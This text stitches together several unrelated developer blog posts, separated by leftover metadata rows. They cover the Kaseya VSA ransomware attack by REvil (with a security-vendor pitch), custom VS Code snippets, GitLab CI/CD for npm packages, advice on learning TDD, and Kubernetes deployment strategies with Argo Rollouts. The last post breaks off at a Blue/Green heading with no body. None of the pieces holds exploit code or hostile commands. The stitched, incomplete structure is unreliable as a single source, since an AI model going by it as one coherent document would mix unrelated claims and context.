> **How did REvil victimize Kaseya?**
Kaseya’s VSA server v9.5.6 had multiple vulnerabilities that were responsibly disclosed by [Frank Breedijk](https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/). The vulnerabilities include, but are not limited to:
- SQL command injection — _patched April 10th, 2021_
- Local File Inclusion — _patched May 8th, 2021_
- Credentials Leak — _unpatched (CVE rating 10/10)_ leading to **Request Forgery token bypass**
- a 2FA (two-factor authentication) bypass on a limited API scope — _unpatched (CVE rating 9.9)_, leading to **Authentication bypass + Code Injection.** The 2FA logic only protected the VSA dashboard, not Live Connect
- Having more than one tab open in Live Connect while remote-connected into a fleet PC/virtual desktop/workstation, then rebooting it, would cause it to reconnect from the last opened tab instead (cross-connecting within and across fleet instances)
- a reflected XSS on an authenticated API path — _unpatched_

During the month of June/July 2021, REvil discovered the exposed VSA servers (possibly via recon) and further on, discovered the unpatched vulnerabilities. REvil took credit for launching one of the farthest reaching ransomware attacks on record beginning July 2 and demanded $70 million in Bitcoin in exchange for a universal decryption routine.
- The unpatched vulnerabilities on the exposed VSA servers were exploited to introduce a malicious script that was sent to all computers managed by the server, thereby transitively reaching all the end clients. The script further on encrypted the systems.
- Trustwave discovered that the malware won’t execute on systems whose default language is Russian, Ukrainian, Belarusian, Romanian, or a language of the former Soviet bloc nations in Central Asia and the Caucasus, as well as Syria.
<figcaption>Credits : <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/</a></figcaption>
> **Why did Kaseya fail to address these inherent security issues?**
As per the latest [Bloomberg](https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say) article,
> Among the most glaring problems was software underpinned by outdated code, the use of **weak encryption and passwords** in Kaseya’s products and servers, a failure to adhere to basic cybersecurity practices such as regularly patching software and a focus on sales at the expense of other priorities, the employees said.
> One of the former employees said that in early 2019 he sent company leaders a 40-page memo detailing security concerns and was fired about two weeks later, which he believed was related to his repeated efforts to flag the problems.
> Another employee said Kaseya rarely patched its software or servers and **stored customer passwords in clear text — meaning they were unencrypted** — on third-party platforms, practices the employee described as glaring security flaws.
> Some engineers and developers at the company said employees quit over frustration that **new features and products were being prioritized over fixing problems**. Others were laid off in 2018, when Kaseya began moving jobs to Minsk, Belarus, where it recruited more than 40 people to do software development work that had previously been carried out in the U.S., according to two of the former employees familiar with the matter. Four of the ex-workers said they viewed the outsourcing of work to Belarus as a potential security issue, given the country’s close political allegiance with the Russian government.
> **Should we (as SaaS and software vendors) be concerned?**
As U.S. Army Gen. **Keith Alexander** aptly paraphrased — “**Either you know you’ve been hacked, or you’ve been hacked and you don’t know you’ve been hacked.**”
If you are authoring and distributing software as COTS or SaaS (agent, runtime observability, management-monitoring, transactions based, web-based, etc.) you should be concerned and stay on top of measuring your supply chain’s security posture.
> **What should we (as SaaS and software vendors) be measuring?**
- Detecting **Vulnerabilities** (OWASP/NIST/MITRE ATT&CK) in your application source code (severity does not matter, as a low-severity vulnerability can be chained with a logic flaw to initiate an attack sequence)
- Detecting **Business logic flaws** in your application — example IDOR (Insecure Direct Object Reference)
- Detecting **sensitive data, secrets and token leaks** that can be weaponized to infiltrate your hosted applications.
- Detecting **vulnerable OSS** (open source software) that is exploitable on an exposed path
- Detecting risk of **insider attacks** — _identify use of suspicious APIs and code flows that can be weaponized in an attack sequence_
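One of the flaws listed above, IDOR, is easy to illustrate: a handler returns a record by its id without checking that the record belongs to the caller. The sketch below is illustrative only; the data and function names are made up:

```javascript
// Illustrative IDOR sketch; the data and function names are hypothetical.
const orders = new Map([
  [101, { owner: "alice", total: 42 }],
  [102, { owner: "bob", total: 7 }],
]);

// Flawed handler: any authenticated user can read any order by guessing its id.
function getOrderInsecure(orderId, currentUser) {
  return orders.get(orderId) || null;
}

// Fixed handler: the record must belong to the caller.
function getOrderSecure(orderId, currentUser) {
  const order = orders.get(orderId);
  if (!order || order.owner !== currentUser) {
    return null; // deny access unless the caller owns the record
  }
  return order;
}
```

The attack is simply incrementing or guessing ids; the fix is an ownership check on every object reference.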
These detection capabilities should not occur in isolation as context is lost if not correlated.
> **What should we do and how can ShiftLeft help?**
Let’s collectively examine how we can protect ourselves in this situation:
- Pay attention to every vulnerability reported (critical or non-critical) and determine if it can become part of an attack chain. Even a simple vulnerability can be weaponized by a RaaS vendor on the dark net.
- Classify your sensitive data and secrets and then determine its lineage, provenance and exposure/leak across all points in your software stack.
- Apply the same rigor/discipline of vulnerability discovery and disclosure with all sites of software development (multi-office, offshore development) and vendors that you partner with.
- Identify insider attack risk, as a dissatisfied employee might decide to partner up with a RaaS developer to effectively infect an organization from the inside and then split the profit.
- Identify and regularly update open source libraries that are vulnerable and can be exploited on exposed API endpoints.
- Protect ALL endpoints using 2FA (not just a subset) and operate at a heightened level of security

We at [ShiftLeft](https://www.shiftleft.io/) have been studying and provisioning advanced detection policies using [**code property graph**](https://www.shiftleft.io/technology/) since mid 2019 (that includes OWASP based vulnerabilities, sensitive data leaks, insider attacks, exploitable open source based vulnerabilities, exposed API endpoints). [Speak to us](https://www.shiftleft.io/contact/) and we can help assess and recommend more efficient processes and procedures.
* * * | vickieli7 |
756,674 | Custom Snippets in VS Code | Tired of writing the same code over and over again? or Want to save time in a... | 13,494 | 2021-07-12T04:48:39 | https://dev.to/cenacr007_harsh/custom-snippets-in-vs-code-23e8 | productivity, vscode, codenewbie, beginners | ## Tired of writing the same code over and over again?
or
## Want to save time in a Competitive Programming contest?
Rest assured, as VS Code allows you to create your very own code snippets to save time while programming.
## What is a Snippet?
A snippet is a small, reusable template of code defined by a prefix and a body. The prefix is what is used to trigger the snippet, and the body is what will be expanded and inserted.
You can create snippets:
* Globally- which will be used for all programming languages across all folders.
* Project- custom snippets for each project separately.
* Language- create templates for each programming language you code in separately.
Not only that, you can create multiple code snippets and use different prefixes to use your snippet of choice whenever you want.
Now let's dive right into it and see how we can do all of this:
**open VS Code > settings > user snippets**
You should see a drop-down menu as shown in the image below.

Now select the particular language for which you want to create the snippets by scrolling or searching for it (by language identifier) in the search box shown, or select the New Global Snippets file if the snippet should appear for all languages.
Here I will show how to create 2 custom snippets for C++:
* One that I use for normal programming.
* Another one that I use for competitive programming.
Select CPP(C++) from the drop-down menu for C++. You'll see commented text in between a pair of curly braces ({ // }). The commented text contains some basic instructions on how to create the snippet along with example code; you can either clear all of it or edit and use the same code.
## Normal Programming Code Snippet
Here is how it looks in the `cpp.json` file
(I'll add a screenshot of the complete page below)

the "snippet-normal-c++" is the title you choose for your snippet
**prefix**: the word by which you access your snippet while coding. Basically, when you type the prefix (in this case **"cpp"**) while coding in a `.cpp` file, VS Code IntelliSense automatically gives you suggestions, from which you can hit enter and get your boilerplate code.
You can see the suggestions VS Code gives in the image below
(try this after creating and saving your snippet):

**body**: this is where you write the code template you want. Each line is written between double quotes " " and lines are separated by a comma (,), which is the typical syntax of a `.json` file.
**description**: you can add a little description if you want, which will be displayed by the VS Code IntelliSense.
Now one particular thing you might have noticed is the "$1" placeholder which I have used.
It indicates the position where the cursor will be placed after the template has been inserted.
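Putting the pieces together, a snippet entry in `cpp.json` follows this general shape (the title, prefix, and body below are an illustrative guess, not an exact copy of the template in the screenshots):

```json
{
  "snippet-normal-c++": {
    "prefix": "cpp",
    "body": [
      "#include <iostream>",
      "using namespace std;",
      "",
      "int main() {",
      "\t$1",
      "\treturn 0;",
      "}"
    ],
    "description": "Boilerplate for normal C++ programming"
  }
}
```

Each array element in `body` becomes one line of the inserted code, and `\t` produces an indented tab stop.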
Here is what the template looks like when used while coding:

## Competitive Programming Code Snippet
Why use `#include <bits/stdc++.h>`, you might ask?
It is a header file that includes every standard library. In programming contests, using this file is a good idea when you want to reduce the time wasted on chores, especially when your rank is time-sensitive.
Also, taking input of the number of test cases is a part of each question, so I have included that in the template I use.
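A competitive-programming snippet of the kind described here could look roughly like this in `cpp.json` (the prefix and exact body are my assumptions for illustration, not the author's own template):

```json
{
  "snippet-competitive-c++": {
    "prefix": "cppcp",
    "body": [
      "#include <bits/stdc++.h>",
      "using namespace std;",
      "",
      "int main() {",
      "\tint t;",
      "\tcin >> t;",
      "\twhile (t--) {",
      "\t\t$1",
      "\t}",
      "\treturn 0;",
      "}"
    ],
    "description": "Competitive programming template with test-case loop"
  }
}
```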
But anyway, that was me. You can design a template that fulfills your own needs.
Here is what the output of this snippet looks like:

Here is what the Competitive Programming Snippet looks like:

And here is what the complete `cpp.json` file looks like:

Hit **Ctrl+S** to save the settings...
You can add as many templates as you want and fine-tune them according to your need.
So what are you waiting for? Go and create your snippet right now. KEEP CODING !!!
If you prefer to watch videos to learn, here is a [YouTube](https://www.youtube.com/watch?v=cVBM5Bn5yjI) video I found helpful while learning how to create custom snippets:
{% youtube cVBM5Bn5yjI %}
There are many more features that you can add to your template and even download some extensions for that. To know more about that you can read Snippets in [Visual Studio Code](https://code.visualstudio.com/docs/editor/userdefinedsnippets).
### If you liked my content consider following me on [Twitter](https://twitter.com/cenacr007_harsh)
Also if you got any questions feel free to ping me on Twitter.
### Thank You! 😊
| cenacr007_harsh |
756,827 | Gitlab CI/CD for npm packages | A couple of weeks ago the IT team in my company talked about having repositories for the packages we... | 0 | 2021-07-21T14:56:37 | https://dev.to/kristijankanalas/gitlab-ci-cd-for-npm-packages-4ncj | devops, npm, git, gitlab | A couple of weeks ago the IT team in my company talked about having repositories for the packages we make for our PHP applications so we can switch to a more natural use of composer. We left the meeting with ideas but not with a concrete solution nor a promise to research this topic.
A few days ago I needed to make a JavaScript package. After creating a repository on our GitLab, I noticed an option for `Packages & Registries`. Since it blew my mind that such an option exists, I decided to research it a little and use it for this JavaScript package if possible.
Here is what I learned in the process.
## Options
Gitlab offers a few registries you can work with: Composer, Conan, Maven, NPM, NuGet, PyPi. I have only tried out the NPM registry, but others should also be easy to work with.
## Publishing an NPM package to registry
This was actually my first time making an NPM package, so I would like to recommend the post [Step by Step building and publishing an NPM typescript package](https://itnext.io/step-by-step-building-and-publishing-an-npm-typescript-package-44fe7164964c) to first-timers like me. It was very easy to understand and no steps were missed.
First of all, in your `package.json` you should scope your project, because GitLab requires packages to be scoped.
For example:
```json
{
"name": "@scope/example-package-name",
"version": "1.0.0"
}
```
After we have this set up, we can tell npm where to publish our package by using a `.npmrc` file or `npm config set registry`. It looks something like this:
```
//gitlab.example.com/api/v4/projects/${PROJECT_ID}/packages/npm/:_authToken=${GITLAB_DEPLOY_TOKEN}
```
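An alternative I've seen is pinning the scoped registry in `package.json` via npm's `publishConfig` field (the scoped-registry form requires a reasonably recent npm; the host and project id below are placeholders, not values from this article):

```json
{
  "name": "@scope/example-package-name",
  "version": "1.0.0",
  "publishConfig": {
    "@scope:registry": "https://gitlab.example.com/api/v4/projects/1234/packages/npm/"
  }
}
```

Authentication via the `_authToken` line in `.npmrc` is still needed either way.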
If the repository is set to internal or private you need to use a Gitlab deploy token. On how to get one, you can read at [Deploy tokens](https://docs.gitlab.com/ee/user/project/deploy_tokens/) documentation.
After running `npm publish` you should be able to see your package in the registry of your repository.

And you should be able to see a version 1.0.0 that says it was pushed manually.
## CI/CD
To make our life and the life of our colleagues better, we can make good use of GitLab's CI/CD system here.
We can use a `.gitlab-ci.yml` configuration that looks like this:
```yaml
stages:
- build
- test
- publish
build:
stage: build
only:
- tags
cache:
key: build-cache
paths:
- node_modules/
- lib/
- .npmrc
policy: push
script:
- echo "//gitlab.example.com/api/v4/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=${CI_JOB_TOKEN}">.npmrc
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm install
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm run build
test:
stage: test
only:
- tags
cache:
key: build-cache
paths:
- node_modules/
- lib/
- .npmrc
policy: pull
script:
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm run test
lint:
stage: test
only:
- tags
cache:
key: build-cache
paths:
- node_modules/
- lib/
- .npmrc
policy: pull
script:
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm run lint
publish:
stage: publish
only:
- tags
cache:
key: build-cache
paths:
- node_modules/
- lib/
- .npmrc
policy: pull
script:
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm version --no-git-tag-version ${CI_COMMIT_TAG}
- docker run -v $(pwd):/app -v /home:/home -w="/app" -u="$(id -u):$(id -g)" -e HOME node:14 npm publish
```
Notable points:
- In the build stage we create a `.npmrc` file that contains the registry path built using the CI environment variables
- All the stages run only on **tags**, a special way to tell the CI/CD system to only activate when you tag the code in your repository
- We build a cache for node_modules, lib and .npmrc, so we limit the number of scripts we need to run after the build step
- Only the build step populates the cache; the others only use it, as defined by the push/pull policy
- In the publish stage we use the `npm version --no-git-tag-version ${CI_COMMIT_TAG}` command. `npm version` is a noisy command that tags and commits code if it detects that the directory is a git repository, which is why we use `--no-git-tag-version` here. As the stage was triggered by us tagging the code, we have the `${CI_COMMIT_TAG}` environment variable available to use for package versioning. After that, we just publish the package.
**Note**
I didn't have a gitlab runner that was setup to use docker normally nor did I have node and npm installed on the machine so I had to use `docker run` commands like shown. So... not the most elegant way of doing it.
The end result is this:

Now the developers don't have to run any scripts locally, just to commit to the repository and tag the code.
If you'd like to support me writing feel free to buy me a cup of coffee.
[](https://www.buymeacoffee.com/wSd4q6U)
| kristijankanalas |
756,832 | Why you might not want to use TDD? | Test Driven Development is a technique that changes the way we think about tests and programming. It doesn’t mean it’s seamless or easy to start with. There are plenty of challenges on your way when you start. That is why I want to address some of them and share a few tips that will make your programmer’s life easier. | 0 | 2021-07-12T09:09:55 | https://dev.to/olaqnysz/why-you-might-not-want-to-use-tdd-26jf | programming, tdd, tests, challenges | ---
title: Why you might not want to use TDD?
published: true
description: Test Driven Development is a technique that changes the way we think about tests and programming. It doesn’t mean it’s seamless or easy to start with. There are plenty of challenges on your way when you start. That is why I want to address some of them and share a few tips that will make your programmer’s life easier.
tags: programming, tdd, tests, challenges
cover_image: https://szkolatestow.online/wp-content/uploads/2021/07/tdd.png
---
I’m a big fan of Test Driven Development. I’ve used it when preparing educational materials, but also in commercial projects. Not only that, but I believe that this technique changes the way we think about tests. Really! Even if you don’t use it daily, once learned, it will influence all your future tests. It doesn’t mean it’s seamless or easy to start with. There are plenty of challenges on your way when you start. That is why I want to address some of them and share a few tips that will make your programmer’s life easier.
# Where to start?
First of all, TDD is hard to start. Many people get lost, because they don’t really know what to do. The process is fairly simple. Just three steps: write a test, write the simplest possible code, and refactor both. Simple. However, when it comes to details, lots of engineers get lost. Which test should I write first? What does a simple solution mean? Should I refactor a big chunk already? Things that are simple are not always easy to work with. There might be lots of confusion and question marks in your head at the beginning.
And these red tests… Programmers usually don’t write tests to check anything. We write them to prove that our code works. Quite a difference! Our goal is not to break the code, but to show that we did a great job. Green color is the best proof. Red lines usually mean that something is wrong, something doesn’t compile, or we just broke it. It doesn't feel good. During the Test Driven Development cycle, we see red all the time, and we get used to it with time. What’s more, we realize that red tests are the most helpful ones. We get suspicious when a test is always green.
I have some really bad news for experienced devs. It’s harder for you than for less experienced folks. I’m sorry, but that’s how it works for many other skills as well. The more experience you have, the more difficult TDD is at the beginning, because you have acquired different habits. It doesn’t matter if you’ve written tests before or not. Starting with a test, when you’ve always jumped straight into a solution, is damn hard.
My advice here is to watch some live coding sessions. Even if you’ve read the best books and checked out some tutorials. Live coding gives you an opportunity to see the thinking process. You witness how decisions are made and what is the flow. You may want to follow the same steps or disagree at some points. But you have something to start with, some initial thesis to be verified. Otherwise, it’s easy to get stuck.
# Should you always follow the process?
Test Driven Development gives you simple building blocks to help you create some nice and well-tested pieces of code. They are so simple that it’s tempting to skip them or modify them. Especially, if you feel like something seems odd you might want to change the process slightly, just to suit your needs. The more you do it, the less TDD it is.
I know that TDD might seem counterintuitive at times, but it IS well-designed. It was created by people who had written thousands of lines of code, and it was tested by thousands of engineers around the world. If you don’t “feel it”, it might be because you’re still in the process of mastering it. I remember one time we were organizing TDD live coding with my friend, and he suggested that we should prepare some code beforehand. I said that it was a tutorial for people who were just starting, so writing the code beforehand seemed like breaking the rules from the very beginning. He didn’t seem convinced, but he agreed. We ended up with much better code than he thought we could have written. This story showed me that TDD has more power than we think.
One of the main problems with mastering TDD is that you don’t see all the benefits instantly. When I started with Machine Learning, I had had a working script differentiating cats from dogs done in two hours. Back in school, when I wrote my first lines of code in Logo, it took me a couple of minutes to see the turtle moving around. When I started using TDD, it took me days to see how it improves my programming style. And it was only because I had taken part in an intense workshop. If I had practiced an hour every day, it would probably have taken me weeks.
The recommendation for TDD beginners is just to follow the process without judging. In IT we love judging everything from the first minutes. We tend to look at things as if they were black or white. There is no grayscale. If something doesn’t work for us right now, it’s probably a piece of crap. That’s why we tend to give up so easily when learning new tools or new skills. If you trust the TDD process and follow it without judging, it will lead you to code you would not have written otherwise.
# How to level up?
When you start working with TDD, you first start with Katas. These are fairly simple problems that have limited business logic and requirements that don’t change. It’s not a coincidence. When you learn a new skill, you should focus on this skill only. It’s like an exercise at the gym. Before you move to CrossFit exercises, you need to learn how to warm up and work out each group of muscles. Our neural system needs to get used to doing exercises before muscle memory is created.
Moving from Kata to business problems can be tricky as well. In projects, we don’t always have all the requirements from the start. There is a possibility that these requirements will change on the way. There are lots of other challenges, like working with clients, continuous integration process, monitoring, bug fixing etc. We cannot focus only on the code and tests. This might make TDD more complex and require a more flexible approach. However, TDD is a very agile process, and because of that it’s perfect for changing circumstances. We just need to prepare before moving onto the “battlefield”.
Holding one’s horses might be hard in this situation. Especially when you start noticing the benefits of a well-tested code created using the Test Driven Development process. I observe this when my students do their first steps using the TDD. Most of them instantly fall in love with the process and want to use it in their project after trying with just one Kata. This is very promising, but might be overwhelming for them. I usually ask them to try one or two more Katas, usually more complex ones.
Real projects are multidimensional. Tools, requirements, processes, and sometimes even people, are constantly changing. We need to learn many things on a daily basis. When we try to use a new skill too early, we can end up disappointed. I’ve heard many stories about TDD working well only for simple problems. I know it’s not true, because I have been using it for business logic, and I also know lots of other engineers who are using it as well. But I totally get this. People move to real projects too early, before they are ready. So they just become overwhelmed, and they give up.
The best way to succeed in using TDD is to practice. Practice, practice, practice, and then move to “real life” problems. Try a couple of simple Katas, then try solving them using pair programming, then organize a coding dojo or mob programming in your team. You will probably hit the wall a couple of times, but within a sandbox environment, it will be easy to overcome these challenges.
# Conclusion
Test Driven Development is a great technique, and it can totally change the way you code. However, it’s not easy to start, it might feel counterintuitive at the beginning and many people easily give up before they see the real benefits in their projects. It’s worth the time to prepare before you try using TDD in your projects. You should invest some time and watch a few live coding sessions, especially if it’s possible to ask questions. This will help you understand the decision-making process. No matter how silly the process might seem at times, you should follow it without judging. The more humble you are at the beginning of the learning process, the faster you will see positive results. Move to the business logic of your project only when you’ve already practiced for some time using different forms of exercise and feel confident in doing complex Katas. I believe you can do it!
Of course, you might ignore all these pieces of advice, but then don’t blame the TDD process if it doesn’t work for you.
---
If you enjoyed this article, you can check out my presentation on this topic during The First International TDD Conference [HERE](https://youtu.be/-_noEVCR__I?t=10917) | olaqnysz |
757,089 | Kubernetes: Deployment Strategies types, and Argo Rollouts | One of the goals of the ArgoCD implementation in our project is to use new Deployment Strategies... | 0 | 2021-07-13T05:54:38 | https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/ | kubernetes, devops, todayilearned | ---
title: Kubernetes: Deployment Strategies types, and Argo Rollouts
published: true
date: 2021-07-12 07:31:40 UTC
tags: kubernetes,devops,todayilearned
canonical_url: https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/
---

One of the goals of the [ArgoCD](https://rtfm.co.ua/en/category/ci-cd-en/argocd-en/) implementation in our project is to use new Deployment Strategies for our applications.
In this post, we will look at deployment types in Kubernetes, how Deployment works in Kubernetes, and a quick example of Argo Rollouts.
- [Deployment Strategies and Kubernetes](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Deployment_Strategies_and_Kubernetes)
- [Recreate](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Recreate)
- [Rolling Update](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Rolling_Update)
- [Kubernetes Canary Deployment](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Kubernetes_Canary_Deployment)
- [Kubernetes Blue/Green Deployment](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Kubernetes_BlueGreen_Deployment)
- [Deployment and ReplicaSet](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Deployment_and_ReplicaSet)
- [Argo Rollouts](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Argo_Rollouts)
- [Install Argo Rollouts](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#Install_Argo_Rollouts)
- [kubectl plugin](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#kubectl_plugin)
- [An application's deploy](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/#An_applications_deploy)
### Deployment Strategies and Kubernetes
Let’s take a short overview of the deployment strategies used in Kubernetes.
Out of the box, Kubernetes has two main types of the `.spec.strategy.type` - the _Recreate_ and _RollingUpdate_, which is the default one.
Also, you can realize a kind of Canary and Blue-Green deployments, although with some limitations.
Documentation is [here>>>](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/#strategy).
#### Recreate
The simplest and most straightforward type: during such a deployment, Kubernetes will stop all existing pods and then spin up a new set.
Obviously, you’ll have some downtime during this: first, the old pods need to be stopped (see the [Pod Lifecycle — Termination of Pods post](https://rtfm.co.ua/en/kubernetes-nginx-php-fpm-graceful-shutdown-and-502-errors/#Pod_Lifecycle_-_Termination_of_Pods) for details), and only then will new ones be created, which then need to pass [Readiness](https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/) checks; during this process, your application will be unavailable for users.
It makes sense to use this type if your application cannot run different versions at the same time, for example, due to limitations of its databases.
An example of such a deployment:
```
apiVersion: apps/v1
kind: Deployment
metadata:
name: hello-deploy
spec:
replicas: 2
  selector:
    matchLabels:
      app: hello-pod
  strategy:
    type: Recreate
  template:
    metadata:
      labels:
        app: hello-pod
        version: "1.0"
spec:
containers:
- name: hello-pod
image: nginxdemos/hello
ports:
- containerPort: 80
```
Deploy it with `version: "1.0"`:
```
$ kubectl apply -f deployment.yaml
deployment.apps/hello-deploy created
```
Check pods:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-77bcf495b7-b2s2x 1/1 Running 0 9s
hello-deploy-77bcf495b7-rb8cb 1/1 Running 0 9s
```
Update its label to `version: "2.0"`, redeploy, and check again:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-dd584d88d-vv5bb 0/1 Terminating 0 51s
hello-deploy-dd584d88d-ws2xp 0/1 Terminating 0 51s
```
Both pods were killed; only after this will new pods be created:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-d6c989569-c67vt 1/1 Running 0 27s
hello-deploy-d6c989569-n7ktz 1/1 Running 0 27s
```
#### Rolling Update
The RollingUpdate is a bit more interesting: here, Kubernetes will run new pods in parallel with the old ones, then kill the old version and leave the new one. Thus, during a deployment, both the old and new versions of an application will be running for some time. It is the default Deployment type.
With this approach, we have zero downtime, as both versions are running during an update.
Still, there are situations when this approach cannot be applied, for example, if during startup pods run [MySQL migrations](https://rtfm.co.ua/en/kubernetes-running-sql-migrations-with-kubernetes-job-and-helm-hook/) that update a database schema in such a way that the old application version can’t use it.
An example of such deployment:
```
apiVersion: apps/v1
kind: Deployment
metadata:
name: hello-deploy
spec:
replicas: 2
selector:
matchLabels:
app: hello-pod
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 0
maxSurge: 1
template:
metadata:
labels:
app: hello-pod
version: "1.0"
spec:
containers:
- name: hello-pod
image: nginxdemos/hello
ports:
- containerPort: 80
```
Here, we’ve changed the `strategy.type: Recreate` to `type: RollingUpdate` and added two optional fields that define a Deployment's behavior during an update:
- `maxUnavailable`: how many pods from the replicas can be killed to run new ones. Can be set as a number or percent.
- `maxSurge`: how many pods can be created over the value from the `replicas`. Can be set as a number or percent.
In the sample above, we’ve set `maxUnavailable` to zero, i.e. we don't want any existing pods stopped until new ones are started, and `maxSurge` is set to 1, so during an update Kubernetes will create one additional pod, and when it is in the Running state, Kubernetes will drop one old pod.
Deploy with the 1.0 version:
```
$ kubectl apply -f deployment.yaml
deployment.apps/hello-deploy created
```
Got two pods running:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-dd584d88d-84qk4 0/1 ContainerCreating 0 3s
hello-deploy-dd584d88d-cgc5v 1/1 Running 0 3s
```
Update the version to 2.0, deploy it again, and check pods:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-d6c989569-dkz7d 0/1 ContainerCreating 0 3s
hello-deploy-dd584d88d-84qk4 1/1 Running 0 55s
hello-deploy-dd584d88d-cgc5v 1/1 Running 0 55s
```
We got one additional pod over the `replicas` value.
#### Kubernetes Canary Deployment
The Canary type implies creating new pods in parallel with old ones, in the same way as the Rolling Update does, but gives a bit more control over the update process.
After running a new version of an application, some of the new requests will be routed to it, while the rest will still be served by the old version.
If the new version works well, the rest of the users will be switched to the new one, and the old pods will be deleted.
The Canary type isn’t included in `.spec.strategy.type`, but it can be realized by Kubernetes itself, without additional controllers.
That said, the solution will be rudimentary and complicated to manage.
Still, we can do it by creating two Deployments with different versions of an application, with both using a Service that has the same set of `labels` in its `selector`.
So, let’s create such a Deployments and a Service with the `LoadBalancer` type.
In the Deployment-1 set `replicas: 2`, and for the Deployment-2 - 0:
```
apiVersion: apps/v1
kind: Deployment
metadata:
name: hello-deploy-1
spec:
replicas: 2
selector:
matchLabels:
app: hello-pod
template:
metadata:
labels:
app: hello-pod
version: "1.0"
spec:
containers:
- name: hello-pod
image: nginxdemos/hello
ports:
- containerPort: 80
lifecycle:
postStart:
exec:
command: ["/bin/sh", "-c", "echo 1 > /usr/share/nginx/html/index.html"]
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: hello-deploy-2
spec:
replicas: 0
selector:
matchLabels:
app: hello-pod
template:
metadata:
labels:
app: hello-pod
version: "2.0"
spec:
containers:
- name: hello-pod
image: nginxdemos/hello
ports:
- containerPort: 80
lifecycle:
postStart:
exec:
command: ["/bin/sh", "-c", "echo 2 > /usr/share/nginx/html/index.html"]
---
apiVersion: v1
kind: Service
metadata:
name: hello-svc
spec:
type: LoadBalancer
ports:
- port: 80
targetPort: 80
protocol: TCP
selector:
app: hello-pod
```
With the `postStart` hook we rewrite NGINX's index file, so we can see which pod accepted a request.
Deploy it:
```
$ kubectl apply -f deployment.yaml
deployment.apps/hello-deploy-1 created
deployment.apps/hello-deploy-2 created
service/hello-svc created
```
Check pods:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-1-dd584d88d-25rbx 1/1 Running 0 71s
hello-deploy-1-dd584d88d-9xsng 1/1 Running 0 71s
```
Currently, the Service will route all the traffic to pods from the Deployment-1:
```
$ curl adb469658008c41cd92a93a7adddd235-1170089858.us-east-2.elb.amazonaws.com
1
$ curl adb469658008c41cd92a93a7adddd235-1170089858.us-east-2.elb.amazonaws.com
1
```
Now, we can update the Deployment-2 and set `replicas: 1`:
```
$ kubectl patch deployment.v1.apps/hello-deploy-2 -p '{"spec":{"replicas": 1}}'
deployment.apps/hello-deploy-2 patched
```
Now we have three pods running with the same label `app=hello-pod`:
```
$ kubectl get pod -l app=hello-pod
NAME READY STATUS RESTARTS AGE
hello-deploy-1-dd584d88d-25rbx 1/1 Running 0 3m2s
hello-deploy-1-dd584d88d-9xsng 1/1 Running 0 3m2s
hello-deploy-2-d6c989569-x2lsb 1/1 Running 0 6s
```
And our Service will now route roughly two-thirds of the traffic to the pods from Deployment-1, and the rest to the pod from Deployment-2:
```
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
2
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
2
```
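The roughly 2:1 split seen above follows directly from the pod counts: the Service balances across all three pods matching `app=hello-pod`, and two of them run version 1.0. A quick simulation of uniform random pod selection (a simplification of the real kube-proxy behavior) shows the expected share:

```python
import random

# Pods matched by the Service: two serve version "1", one serves version "2"
pods = ["1", "1", "2"]

random.seed(42)  # fixed seed so the run is reproducible
hits = [random.choice(pods) for _ in range(10_000)]
share_v1 = hits.count("1") / len(hits)

print(f"share of requests answered by v1: {share_v1:.1%}")  # roughly two-thirds
```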
After checking that version 2.0 is working without errors, we can delete the old version and scale the new one up to 2 pods.
#### Kubernetes Blue/Green Deployment
